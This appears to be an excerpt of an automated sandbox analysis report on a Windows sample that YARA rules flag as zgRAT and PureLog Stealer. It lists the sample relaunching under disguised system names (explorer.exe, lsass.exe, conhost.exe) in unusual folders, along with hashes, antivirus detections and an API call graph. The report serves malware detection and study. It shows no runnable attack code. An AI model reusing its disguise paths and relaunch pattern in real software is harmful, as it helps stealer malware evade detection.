                                                          Path:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                                          Imagebase:0xba0000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:23:58:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\debug\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\debug\explorer.exe"
                                                          Imagebase:0xa0000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:23:58:18
                                                          Start date:30/09/2024
                                                          Path:C:\blockhostnet\msinto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\blockhostnet\msinto.exe"
                                                          Imagebase:0xa20000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:23:58:26
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                                          Imagebase:0x450000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:23:58:34
                                                          Start date:30/09/2024
                                                          Path:C:\Recovery\lsass.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Recovery\lsass.exe"
                                                          Imagebase:0x600000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:23:58:42
                                                          Start date:30/09/2024
                                                          Path:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                                          Imagebase:0x730000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:23:58:50
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\debug\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\debug\explorer.exe"
                                                          Imagebase:0xbd0000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2bffd67107591f78218734182e0484e9ad77e28c67f92d3053ec18d87baf3034
                                                            • Instruction ID: bd473801df6dd5177ba7c406c474570142a0b0504de55db4d0f9ab77b182de74
                                                            • Opcode Fuzzy Hash: 2bffd67107591f78218734182e0484e9ad77e28c67f92d3053ec18d87baf3034
                                                            • Instruction Fuzzy Hash: E08289358202558FDB75CFBCC8CB7AA77A1FF05204B1949A9CCC69F25BE631D4068B86
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c28d9e006d8d44a53bb5a9d6ebf609cfe863391477d47e19da69674706f159f
                                                            • Instruction ID: 501c9901c0aa93f11caf62bbf1c21edec217bf23baf4f91474ec3637dc756e24
                                                            • Opcode Fuzzy Hash: 6c28d9e006d8d44a53bb5a9d6ebf609cfe863391477d47e19da69674706f159f
                                                            • Instruction Fuzzy Hash: A7326874E012298FDB64DF69D994B9DBBB2BB49300F1481EAD80DA7354EB309E85CF11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50caf018d175bd414f0d416af043040115d696f1ea72aeed7776d70ab43aebae
                                                            • Instruction ID: 7fa2e27b21eb7ef01b7169444575af4fbd5b1822151be45ff81dbdb8794ca15a
                                                            • Opcode Fuzzy Hash: 50caf018d175bd414f0d416af043040115d696f1ea72aeed7776d70ab43aebae
                                                            • Instruction Fuzzy Hash: A2D15030A006058FDB25DF78D4546AEBBF2FFC8700F288529D516AB394DB349D46CB95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00dd4b53bbd1ba9b8d3ca036ab2f919d598f872dc39148b6e3508ae802f412db
                                                            • Instruction ID: 4ae280b21fc0b3ad291a648c323ba0249a577ba333a62fc6f5775357a3900aa6
                                                            • Opcode Fuzzy Hash: 00dd4b53bbd1ba9b8d3ca036ab2f919d598f872dc39148b6e3508ae802f412db
                                                            • Instruction Fuzzy Hash: F7516F39355151CFC76AEB64999917E37A3ABC560074C00A9D857CB388DF249E03DFCA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfcab965ea774742ea1867efbb582c05e68076ec52b1f91a77ade7e447ce7862
                                                            • Instruction ID: eda1c050642698865e9078db946a7467e206444001299d6a3e89c2cc97efdb38
                                                            • Opcode Fuzzy Hash: cfcab965ea774742ea1867efbb582c05e68076ec52b1f91a77ade7e447ce7862
                                                            • Instruction Fuzzy Hash: 4E5192307081158FEB29AA75A85423F769BAFC6A4071C443ED407CF385DF68CD079B99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6055cf1562011591c7efa2f59c71e7bec0055c2588364b64cde7401db673f1d3
                                                            • Instruction ID: 0945d97356075fac350d5ef334a988695c7f0bccdc54b151db7b89292cdc608a
                                                            • Opcode Fuzzy Hash: 6055cf1562011591c7efa2f59c71e7bec0055c2588364b64cde7401db673f1d3
                                                            • Instruction Fuzzy Hash: C1210274E0020ADFDB14DFA9C5409AEBBF1FB89300F10946AD914AB360EB359E46CF91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a6fd2a0ab06110f9eca77bb5c27db8b52113a5db1073591736eec333023c2b3
                                                            • Instruction ID: ff446dfeec2e12ea3f6a826beb52f07c9a38ab2a104c110e314d0c41d5aad30b
                                                            • Opcode Fuzzy Hash: 8a6fd2a0ab06110f9eca77bb5c27db8b52113a5db1073591736eec333023c2b3
                                                            • Instruction Fuzzy Hash: EA21E274E0020ADFDB14DFA9C5409AEBBF1FB89300F10956AD514AB360EB359E46CF91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc579afdf74a9db2ef1698120e85234237bf50cbac329a94056ac79cc8aa3c57
                                                            • Instruction ID: 13abb188e46bd07e554e346b14ea9683132beb38afecf1ec242dddc3bb9f81d6
                                                            • Opcode Fuzzy Hash: bc579afdf74a9db2ef1698120e85234237bf50cbac329a94056ac79cc8aa3c57
                                                            • Instruction Fuzzy Hash: 560128347051449FD7051B3A98185ABBBEFAFCA250B188077F506C7389DE348C0257A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8079283823302b310f2a6a147cb58191f20fb685025f1b9c6c57b55c56ccea6
                                                            • Instruction ID: 0b0a6cb8bf9b81fee6283f34804bf536aa610aa6095241b8529f8e419b9f2811
                                                            • Opcode Fuzzy Hash: f8079283823302b310f2a6a147cb58191f20fb685025f1b9c6c57b55c56ccea6
                                                            • Instruction Fuzzy Hash: 43012630B052409FDB141B3998186EBBBEBAFC9310F25403BE506C7349DA348C028761
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e29839273da87e6a285daff4209f42aebe652eec8c06550ebad370d80623236
                                                            • Instruction ID: 749557ebbf1ac2e24fc46ff5552a2ed798bbf234248f5c78a8ce87bb856ba1f8
                                                            • Opcode Fuzzy Hash: 3e29839273da87e6a285daff4209f42aebe652eec8c06550ebad370d80623236
                                                            • Instruction Fuzzy Hash: 3E0105B4D00609EFDB44DFA9D5446AEBBF1FB49300F1485AAD814E7354EB309A01CF50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77fc9b7a7d6836c439fc2406da5302a39872a7ed1772266a5d5f75bd93ac37a2
                                                            • Instruction ID: 98b5adcc10f3fd9eaa77342794e744b3d5e69287238c03d80e8ac2d66fc9d77d
                                                            • Opcode Fuzzy Hash: 77fc9b7a7d6836c439fc2406da5302a39872a7ed1772266a5d5f75bd93ac37a2
                                                            • Instruction Fuzzy Hash: B2E09A30D0020D9FDBA4EFA9C9426AEBFB0FB04200F10816AD808D6704E2319A428B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95421ce9089f5aaa5bc98189440435c869fe59fe5dd4fda806b4fef5b6e9f434
                                                            • Instruction ID: e5bdb7b6aa99aa8ebec208a29ecba22522240c985a560cd5b7d8a527a43b3db3
                                                            • Opcode Fuzzy Hash: 95421ce9089f5aaa5bc98189440435c869fe59fe5dd4fda806b4fef5b6e9f434
                                                            • Instruction Fuzzy Hash: 2EE0EC70D042099FDB94EFA9C54666EBBF4AB48200F10856AD819D6244E7705A518FC1

                                                            Execution Graph

                                                            Execution Coverage:9.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:5%
                                                            Total number of Nodes:1488
                                                            Total number of Limit Nodes:27
execution_graph: rendered as an interactive graph in the original report (1488 nodes, 27 limit nodes) and not reproducible as text here. The node labels that survive cover the sample's native code between 0x834000 and 0x860900 and show the MSVC delay-load helper (___delayLoadHelper2@8 with LoadLibraryExA, GetProcAddress, VirtualProtect, RaiseException), CRT start-up (___scrt_is_nonwritable_in_current_image, InitializeCriticalSectionAndSpinCount, TlsAlloc), GetCommandLineW, GetModuleFileNameW, SetEnvironmentVariableW, OpenFileMappingW/MapViewOfFile/UnmapViewOfFile, DialogBoxParamW, GDI+ start-up (GdiplusStartup, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap), OleInitialize, AllocConsole/AttachConsole/WriteConsoleW/FreeConsole, GetVersionExW, and resource loading (FindResourceW, LoadResource, CreateStreamOnHGlobal).
83e29e GetModuleHandleW FindResourceW 24240 83da55 24239->24240 24240->24080 24242 8398ea 24241->24242 24243 83994b CreateFileW 24242->24243 24244 83996c GetLastError 24243->24244 24247 8399bb 24243->24247 24298 83bb03 24244->24298 24246 83998c 24246->24247 24249 839990 CreateFileW GetLastError 24246->24249 24248 8399ff 24247->24248 24250 8399e5 SetFileTime 24247->24250 24248->24205 24249->24247 24251 8399b5 24249->24251 24250->24248 24251->24247 24253 856349 24252->24253 24254 85634d 24253->24254 24265 856375 24253->24265 24302 8591a8 20 API calls _abort 24254->24302 24256 856352 24303 859087 26 API calls __cftof 24256->24303 24257 84fbbc CatchGuardHandler 5 API calls 24260 8566a6 24257->24260 24259 85635d 24261 84fbbc CatchGuardHandler 5 API calls 24259->24261 24260->24206 24262 856369 24261->24262 24262->24206 24264 856699 24264->24257 24265->24264 24304 856230 5 API calls CatchGuardHandler 24265->24304 24267 839e92 24266->24267 24270 839ea5 24266->24270 24272 839eb0 24267->24272 24305 836d5b 77 API calls 24267->24305 24268 839eb8 SetFilePointer 24271 839ed4 GetLastError 24268->24271 24268->24272 24270->24268 24270->24272 24271->24272 24273 839ede 24271->24273 24272->24216 24273->24272 24306 836d5b 77 API calls 24273->24306 24276 8395cf 24275->24276 24277 8395be 24275->24277 24276->24239 24277->24276 24278 8395d1 24277->24278 24279 8395ca 24277->24279 24312 839620 24278->24312 24307 83974e 24279->24307 24283 839bdc 24282->24283 24285 839be3 24282->24285 24283->24216 24285->24283 24286 839785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24285->24286 24327 836d1a 77 API calls 24285->24327 24286->24285 24287->24216 24288->24213 24289->24236 24290->24236 24291->24236 24292->24236 24293->24236 24294->24236 24295->24223 24296->24224 24297->24226 24299 83bb10 _wcslen 24298->24299 24300 83bbb8 GetCurrentDirectoryW 24299->24300 24301 83bb39 _wcslen 24299->24301 24300->24301 24301->24246 24302->24256 24303->24259 24304->24265 24305->24270 24306->24272 24308 
839781 24307->24308 24309 839757 24307->24309 24308->24276 24309->24308 24318 83a1e0 24309->24318 24313 83964a 24312->24313 24315 83962c 24312->24315 24314 839669 24313->24314 24326 836bd5 76 API calls 24313->24326 24314->24276 24315->24313 24316 839638 CloseHandle 24315->24316 24316->24313 24319 84ec50 24318->24319 24320 83a1ed DeleteFileW 24319->24320 24321 83a200 24320->24321 24322 83977f 24320->24322 24323 83bb03 GetCurrentDirectoryW 24321->24323 24322->24276 24324 83a214 24323->24324 24324->24322 24325 83a218 DeleteFileW 24324->24325 24325->24322 24326->24314 24327->24285 24330 84eb3d ___std_exception_copy 24328->24330 24329 8490d6 24329->23865 24330->24329 24333 84eb59 24330->24333 24337 857a5e 7 API calls 2 library calls 24330->24337 24332 84f5c9 24339 85238d RaiseException 24332->24339 24333->24332 24338 85238d RaiseException 24333->24338 24335 84f5e6 24337->24330 24338->24332 24339->24335 24341 857ce1 _unexpected 24340->24341 24342 857ce8 24341->24342 24343 857cfa 24341->24343 24376 857e2f GetModuleHandleW 24342->24376 24364 85ac31 EnterCriticalSection 24343->24364 24346 857ced 24346->24343 24377 857e73 GetModuleHandleExW 24346->24377 24347 857d9f 24365 857ddf 24347->24365 24351 857d76 24355 857d8e 24351->24355 24360 858a91 _abort 5 API calls 24351->24360 24353 857dbc 24368 857dee 24353->24368 24354 857de8 24386 862390 5 API calls CatchGuardHandler 24354->24386 24361 858a91 _abort 5 API calls 24355->24361 24356 857d01 24356->24347 24356->24351 24385 8587e0 20 API calls _abort 24356->24385 24360->24355 24361->24347 24364->24356 24387 85ac81 LeaveCriticalSection 24365->24387 24367 857db8 24367->24353 24367->24354 24388 85b076 24368->24388 24371 857e1c 24374 857e73 _abort 8 API calls 24371->24374 24372 857dfc GetPEB 24372->24371 24373 857e0c GetCurrentProcess TerminateProcess 24372->24373 24373->24371 24375 857e24 ExitProcess 24374->24375 24376->24346 24378 857ec0 24377->24378 24379 857e9d GetProcAddress 24377->24379 24381 857ec6 FreeLibrary 24378->24381 
24382 857ecf 24378->24382 24380 857eb2 24379->24380 24380->24378 24381->24382 24383 84fbbc CatchGuardHandler 5 API calls 24382->24383 24384 857cf9 24383->24384 24384->24343 24385->24351 24387->24367 24389 85b09b 24388->24389 24393 85b091 24388->24393 24390 85ac98 _abort 5 API calls 24389->24390 24390->24393 24391 84fbbc CatchGuardHandler 5 API calls 24392 857df8 24391->24392 24392->24371 24392->24372 24393->24391 25475 841bbd GetCPInfo IsDBCSLeadByte 25476 85b1b8 27 API calls 2 library calls 25477 84b5c0 100 API calls 25478 8477c0 118 API calls 25479 84ffc0 RaiseException _com_error::_com_error CallUnexpected 24401 84dec2 24402 84decf 24401->24402 24403 83e617 53 API calls 24402->24403 24404 84dedc 24403->24404 24405 834092 _swprintf 51 API calls 24404->24405 24406 84def1 SetDlgItemTextW 24405->24406 24409 84b568 PeekMessageW 24406->24409 24410 84b583 GetMessageW 24409->24410 24411 84b5bc 24409->24411 24412 84b5a8 TranslateMessage DispatchMessageW 24410->24412 24413 84b599 IsDialogMessageW 24410->24413 24412->24411 24413->24411 24413->24412 25426 8462ca 123 API calls __InternalCxxFrameHandler 24420 84e2d7 24421 84e1db 24420->24421 24422 84e85d ___delayLoadHelper2@8 14 API calls 24421->24422 24422->24421 24425 84e1d1 14 API calls ___delayLoadHelper2@8 25482 85a3d0 21 API calls 2 library calls 24426 8310d5 24431 835abd 24426->24431 24432 835ac7 __EH_prolog 24431->24432 24438 83b505 24432->24438 24434 835ad3 24444 835cac GetCurrentProcess GetProcessAffinityMask 24434->24444 24439 83b50f __EH_prolog 24438->24439 24445 83f1d0 82 API calls 24439->24445 24441 83b521 24446 83b61e 24441->24446 24445->24441 24447 83b630 __cftof 24446->24447 24450 8410dc 24447->24450 24453 84109e GetCurrentProcess GetProcessAffinityMask 24450->24453 24454 83b597 24453->24454 24454->24434 25483 862bd0 VariantClear 25429 84f4d3 20 API calls 25430 850ada 51 API calls 2 library calls 24549 8313e1 84 API calls 2 library calls 24550 84eae7 24551 84eaf1 24550->24551 24552 84e85d 
___delayLoadHelper2@8 14 API calls 24551->24552 24553 84eafe 24552->24553 25431 84f4e7 29 API calls _abort 24554 84b7e0 24555 84b7ea __EH_prolog 24554->24555 24722 831316 24555->24722 24558 84bf0f 24787 84d69e 24558->24787 24559 84b82a 24561 84b838 24559->24561 24562 84b89b 24559->24562 24637 84b841 24559->24637 24564 84b83c 24561->24564 24565 84b878 24561->24565 24568 84b92e GetDlgItemTextW 24562->24568 24572 84b8b1 24562->24572 24574 83e617 53 API calls 24564->24574 24564->24637 24576 84b95f EndDialog 24565->24576 24565->24637 24566 84bf38 24569 84bf41 SendDlgItemMessageW 24566->24569 24570 84bf52 GetDlgItem SendMessageW 24566->24570 24567 84bf2a SendMessageW 24567->24566 24568->24565 24571 84b96b 24568->24571 24569->24570 24805 84a64d GetCurrentDirectoryW 24570->24805 24577 84b980 GetDlgItem 24571->24577 24720 84b974 24571->24720 24573 83e617 53 API calls 24572->24573 24580 84b8ce SetDlgItemTextW 24573->24580 24581 84b85b 24574->24581 24576->24637 24578 84b994 SendMessageW SendMessageW 24577->24578 24579 84b9b7 SetFocus 24577->24579 24578->24579 24583 84b9c7 24579->24583 24597 84b9e0 24579->24597 24584 84b8d9 24580->24584 24827 83124f SHGetMalloc 24581->24827 24582 84bf82 GetDlgItem 24586 84bfa5 SetWindowTextW 24582->24586 24587 84bf9f 24582->24587 24588 83e617 53 API calls 24583->24588 24591 84b8e6 GetMessageW 24584->24591 24584->24637 24806 84abab GetClassNameW 24586->24806 24587->24586 24592 84b9d1 24588->24592 24589 84be55 24593 83e617 53 API calls 24589->24593 24595 84b8fd IsDialogMessageW 24591->24595 24591->24637 24828 84d4d4 24592->24828 24599 84be65 SetDlgItemTextW 24593->24599 24595->24584 24601 84b90c TranslateMessage DispatchMessageW 24595->24601 24604 83e617 53 API calls 24597->24604 24598 84c1fc SetDlgItemTextW 24598->24637 24602 84be79 24599->24602 24601->24584 24605 83e617 53 API calls 24602->24605 24607 84ba17 24604->24607 24641 84be9c _wcslen 24605->24641 24606 84bff0 24610 84c020 24606->24610 24613 83e617 53 API calls 24606->24613 24612 834092 
_swprintf 51 API calls 24607->24612 24608 84c73f 97 API calls 24608->24606 24609 84b9d9 24732 83a0b1 24609->24732 24621 84c73f 97 API calls 24610->24621 24646 84c0d8 24610->24646 24615 84ba29 24612->24615 24618 84c003 SetDlgItemTextW 24613->24618 24617 84d4d4 16 API calls 24615->24617 24616 84c18b 24622 84c194 EnableWindow 24616->24622 24623 84c19d 24616->24623 24617->24609 24624 83e617 53 API calls 24618->24624 24619 84ba68 GetLastError 24620 84ba73 24619->24620 24738 84ac04 SetCurrentDirectoryW 24620->24738 24626 84c03b 24621->24626 24622->24623 24627 84c1ba 24623->24627 24846 8312d3 GetDlgItem EnableWindow 24623->24846 24628 84c017 SetDlgItemTextW 24624->24628 24631 84c072 24626->24631 24638 84c04d 24626->24638 24634 84c1e1 24627->24634 24650 84c1d9 SendMessageW 24627->24650 24628->24610 24629 84ba87 24635 84ba90 GetLastError 24629->24635 24636 84ba9e 24629->24636 24630 83e617 53 API calls 24630->24637 24632 84c0cb 24631->24632 24672 84c73f 97 API calls 24631->24672 24642 84c73f 97 API calls 24632->24642 24634->24637 24643 83e617 53 API calls 24634->24643 24635->24636 24644 84baae GetTickCount 24636->24644 24645 84bb20 24636->24645 24696 84bb11 24636->24696 24844 849ed5 32 API calls 24638->24844 24640 84c1b0 24847 8312d3 GetDlgItem EnableWindow 24640->24847 24647 83e617 53 API calls 24641->24647 24668 84beed 24641->24668 24642->24646 24651 84b862 24643->24651 24652 834092 _swprintf 51 API calls 24644->24652 24655 84bcfb 24645->24655 24656 84bcf1 24645->24656 24657 84bb39 GetModuleFileNameW 24645->24657 24646->24616 24654 84c169 24646->24654 24667 83e617 53 API calls 24646->24667 24653 84bed0 24647->24653 24648 84bd56 24747 8312f1 GetDlgItem ShowWindow 24648->24747 24650->24634 24651->24598 24651->24637 24666 84bac7 24652->24666 24660 834092 _swprintf 51 API calls 24653->24660 24845 849ed5 32 API calls 24654->24845 24664 83e617 53 API calls 24655->24664 24656->24565 24656->24655 24838 83f28c 82 API calls 24657->24838 24659 84bd66 24748 8312f1 GetDlgItem 
ShowWindow 24659->24748 24660->24668 24663 84c066 24663->24631 24671 84bd05 24664->24671 24739 83966e 24666->24739 24667->24646 24668->24630 24669 84c188 24669->24616 24670 84bb5f 24674 834092 _swprintf 51 API calls 24670->24674 24675 834092 _swprintf 51 API calls 24671->24675 24676 84c0a0 24672->24676 24673 84bd70 24677 83e617 53 API calls 24673->24677 24679 84bb81 CreateFileMappingW 24674->24679 24680 84bd23 24675->24680 24676->24632 24681 84c0a9 DialogBoxParamW 24676->24681 24682 84bd7a SetDlgItemTextW 24677->24682 24684 84bbe3 GetCommandLineW 24679->24684 24714 84bc60 __InternalCxxFrameHandler 24679->24714 24693 83e617 53 API calls 24680->24693 24681->24565 24681->24632 24749 8312f1 GetDlgItem ShowWindow 24682->24749 24683 84baed 24687 84baf4 GetLastError 24683->24687 24688 84baff 24683->24688 24689 84bbf4 24684->24689 24685 84bc6b ShellExecuteExW 24712 84bc88 24685->24712 24687->24688 24691 83959a 80 API calls 24688->24691 24839 84b425 SHGetMalloc 24689->24839 24690 84bd8c SetDlgItemTextW GetDlgItem 24694 84bdc1 24690->24694 24695 84bda9 GetWindowLongW SetWindowLongW 24690->24695 24691->24696 24698 84bd3d 24693->24698 24750 84c73f 24694->24750 24695->24694 24696->24645 24696->24648 24697 84bc10 24840 84b425 SHGetMalloc 24697->24840 24702 84bc1c 24841 84b425 SHGetMalloc 24702->24841 24703 84bccb 24703->24656 24709 84bce1 UnmapViewOfFile CloseHandle 24703->24709 24704 84c73f 97 API calls 24706 84bddd 24704->24706 24775 84da52 24706->24775 24707 84bc28 24842 83f3fa 82 API calls 2 library calls 24707->24842 24709->24656 24711 84bc3f MapViewOfFile 24711->24714 24712->24703 24715 84bcb7 Sleep 24712->24715 24714->24685 24715->24703 24715->24712 24716 84c73f 97 API calls 24719 84be03 24716->24719 24717 84be2c 24843 8312d3 GetDlgItem EnableWindow 24717->24843 24719->24717 24721 84c73f 97 API calls 24719->24721 24720->24565 24720->24589 24721->24717 24723 831378 24722->24723 24724 83131f 24722->24724 24849 83e2c1 GetWindowLongW SetWindowLongW 24723->24849 24726 831385 
24724->24726 24848 83e2e8 62 API calls 2 library calls 24724->24848 24726->24558 24726->24559 24726->24637 24728 831341 24728->24726 24729 831354 GetDlgItem 24728->24729 24729->24726 24730 831364 24729->24730 24730->24726 24731 83136a SetWindowTextW 24730->24731 24731->24726 24735 83a0bb 24732->24735 24733 83a14c 24734 83a2b2 8 API calls 24733->24734 24736 83a175 24733->24736 24734->24736 24735->24733 24735->24736 24850 83a2b2 24735->24850 24736->24619 24736->24620 24738->24629 24740 839678 24739->24740 24741 8396d5 CreateFileW 24740->24741 24742 8396c9 24740->24742 24741->24742 24743 83971f 24742->24743 24744 83bb03 GetCurrentDirectoryW 24742->24744 24743->24683 24745 839704 24744->24745 24745->24743 24746 839708 CreateFileW 24745->24746 24746->24743 24747->24659 24748->24673 24749->24690 24751 84c749 __EH_prolog 24750->24751 24752 84bdcf 24751->24752 24753 84b314 ExpandEnvironmentStringsW 24751->24753 24752->24704 24762 84c780 _wcslen _wcsrchr 24753->24762 24755 84b314 ExpandEnvironmentStringsW 24755->24762 24756 84ca67 SetWindowTextW 24756->24762 24759 853e3e 22 API calls 24759->24762 24761 84c855 SetFileAttributesW 24763 84c90f GetFileAttributesW 24761->24763 24764 84c86f __cftof _wcslen 24761->24764 24762->24752 24762->24755 24762->24756 24762->24759 24762->24761 24768 84cc31 GetDlgItem SetWindowTextW SendMessageW 24762->24768 24770 84cc71 SendMessageW 24762->24770 24871 841fbb CompareStringW 24762->24871 24872 84a64d GetCurrentDirectoryW 24762->24872 24874 83a5d1 6 API calls 24762->24874 24875 83a55a FindClose 24762->24875 24876 84b48e 76 API calls 2 library calls 24762->24876 24763->24762 24766 84c921 DeleteFileW 24763->24766 24764->24762 24764->24763 24873 83b991 51 API calls 2 library calls 24764->24873 24766->24762 24772 84c932 24766->24772 24768->24762 24769 834092 _swprintf 51 API calls 24771 84c952 GetFileAttributesW 24769->24771 24770->24762 24771->24772 24773 84c967 MoveFileW 24771->24773 24772->24769 24773->24762 24774 84c97f MoveFileExW 
